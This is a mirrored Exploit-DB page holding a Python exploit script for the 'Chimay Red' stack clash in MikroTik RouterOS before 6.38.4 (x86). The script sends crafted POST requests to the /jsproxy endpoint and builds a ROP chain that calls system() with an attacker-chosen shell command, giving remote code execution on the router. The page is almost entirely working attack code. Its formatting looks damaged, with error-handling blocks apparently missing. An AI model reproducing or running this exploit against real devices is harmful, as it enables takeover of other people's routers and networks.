MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution

  • 作者: Lorenzo Santina
    日期: 2018-03-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/44284/
  • #!/usr/bin/env python2
    # Mikrotik Chimay Red Stack Clash Exploit by wsxarcher (based on BigNerd95 POC)
    # tested on RouterOS 6.38.4 (x86)
    # ASLR enabled on libs only
    # DEP enabled
    import socket, time, sys, struct
    from pwn import *
    import ropgadget
    AST_STACKSIZE = 0x800000 # default stack size per thread (8 MB)
    ROS_STACKSIZE =0x20000 # newer version of ROS have a different stack size per thread (128 KB)
    SKIP_SPACE= 0x1000 # 4 KB of "safe" space for the stack of thread 2
    ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!
    ALIGN_SIZE= 0x10 # alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
    ADDRESS_SIZE=0x4 # we need to overwrite a return address to start the ROP chain
    context(arch="i386", os="linux", log_level="WARNING")
    gadgets = dict()
    plt = dict()
    strings = dict()
    system_chunks = []
    cmd_chunks = []
    def makeHeader(num):
    return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")
    def makeSocket(ip, port):
    s = socket.socket()
    s.connect((ip, port))
    print("Error connecting to socket")
    return s
    def socketSend(s, data):
    print("Error sending data")
    def ropCall(function_address, *arguments):
    payload = struct.pack('<L', function_address)
    num_arg = len(arguments)
    if num_arg > 0:
    if num_arg == 1:
    ret_gadget = gadgets['p']
    elif num_arg == 2:
    ret_gadget = gadgets['pp']
    elif num_arg == 3:
    ret_gadget = gadgets['ppp']
    elif num_arg == 4:
    ret_gadget = gadgets['pppp']
    payload += struct.pack('<L', ret_gadget)
    for arg in arguments:
    payload += struct.pack('<L', arg)
    return payload
    # pwntools filters out JOP gadgets
    # https://github.com/Gallopsled/pwntools/blob/5d537a6189be5131e63144e20556302606c5895e/pwnlib/rop/rop.py#L1074
    def ropSearchJmp(elf, instruction):
    oldargv = sys.argv
    sys.argv = ['ropgadget', '--binary', elf.path, '--only', 'jmp']
    args = ropgadget.args.Args().getArgs()
    core = ropgadget.core.Core(args)
    sys.argv = oldargv
    for gadget in core._Core__gadgets:
    address = gadget['vaddr'] - elf.load_addr + elf.address
    if gadget['gadget'] == instruction:
    return address
    def loadOffsets(binary, shellCmd):
    elf = ELF(binary)
    rop = ROP(elf)
    if len([_ for _ in elf.search("pthread_attr_setstacksize")]) > 0:
    global AST_STACKSIZE
    # www PLT symbols
    plt["strncpy"] = elf.plt['strncpy']
    plt["dlsym"] = elf.plt['dlsym']
    # Gadgets to clean the stack from arguments
    gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address
    gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address
    gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address
    gadgets['p'] = rop.search(regs=["ebp"]).address
    # Gadget to jump on the result of dlsym (address of system)
    gadgets['jeax'] = ropSearchJmp(elf, "jmp eax")
    system_chunks.extend(searchStringChunksLazy(elf, "system\x00"))
    cmd_chunks.extend(searchStringChunksLazy(elf, shellCmd + "\x00"))
    # get the address of the first writable segment to store strings
    writable_address = elf.writable_segments[0].header.p_paddr
    strings['system'] = writable_address
    strings['cmd']= writable_address + 0xf
    def generateStrncpyChain(dst, chunks):
    chain = ""
    offset = 0
    for (address, length) in chunks:
    chain += ropCall(plt["strncpy"], dst + offset, address, length)
    offset += length
    return chain
    # only search for single chars
    def searchStringChunksLazy(elf, string):
    chunks = []
    for b in string:
    res = [_ for _ in elf.search(b)]
    if len(res) > 0:
    chunks.append((res[0], 1))
    if len(string) != len(chunks):
    return chunks
    # [bugged, some problem with dots, not used]
    # search chunks of string
    def searchStringChunks(elf, string):
    chunks = []
    total = len(string)
    if string == "":
    looking = string
    while string != "":
    results = [_ for _ in elf.search(looking)]
    if len(results) > 0:
    chunks.append((results[0], len(looking)))
    string = string[len(looking):]
    looking = string
    else: # search failed
    looking = looking[:-1] # search again removing last char
    check_length = 0
    for (address, length) in chunks:
    check_length = check_length + length
    if check_length == total:
    return chunks
    def buildROP(binary, shellCmd):
    loadOffsets(binary, shellCmd)
    # ROP chain
    exploit= generateStrncpyChain(strings['system'], system_chunks) # w_segment = "system"
    exploit += generateStrncpyChain(strings['cmd'], cmd_chunks) # w_segment = "bash cmd"
    exploit += ropCall(plt["dlsym"], 0, strings['system']) # dlsym(0, "system"), eax = libc.system
    exploit += ropCall(gadgets['jeax'], strings['cmd'])# system("cmd")
    # The server is automatically restarted after 3 secs, so we make it crash with a random address
    exploit += struct.pack('<L', 0x13371337)
    return exploit
    def stackClash(ip, port, ropChain):
    print("Opening 2 sockets")
    # 1) Start 2 threads
    # open 2 socket so 2 threads are created
    s1 = makeSocket(ip, port) # socket 1, thread A
    s2 = makeSocket(ip, port) # socket 2, thread B
    print("Stack clash...")
    # 2) Stack Clash
    # 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A)
    socketSend(s1, makeHeader(AST_STACKSIZE + SKIP_SPACE + ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)
    # 2.2) send some bytes as post data to socket 1 (thread A)
    socketSend(s1, b'A'*(SKIP_SPACE - ALIGN_SIZE - ADDRESS_SIZE)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved
    # 2.3) send post header with Content-Length to reserve ROP space to socket 2 (thread B)
    socketSend(s2, makeHeader(ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned
    print("Sending payload")
    # 3) Send ROP chain
    socketSend(s1, ropChain) # thread A writes the ROP chain in the stack of thread B
    print("Starting exploit")
    # 4) Start ROP chain
    s2.close() # close socket 2 to return from the function of thread B and start ROP chain
    def crash(ip, port):
    s = makeSocket(ip, port)
    socketSend(s, makeHeader(-1))
    socketSend(s, b'A' * 0x1000)
    time.sleep(2.5) # www takes up to 3 seconds to restart
    if __name__ == "__main__":
    if len(sys.argv) == 5:
    ip = sys.argv[1]
    port = int(sys.argv[2])
    binary = sys.argv[3]
    shellCmd = sys.argv[4]
    print("Building ROP chain...")
    ropChain = buildROP(binary, shellCmd)
    print("The ROP chain is " + str(len(ropChain)) + " bytes long (" + str(ROP_SPACE) + " bytes available)")
    crash(ip, port) # should make stack clash more reliable
    stackClash(ip, port, ropChain)
    print("Usage: ./StackClashROPsystem.py IP PORT binary shellcommand")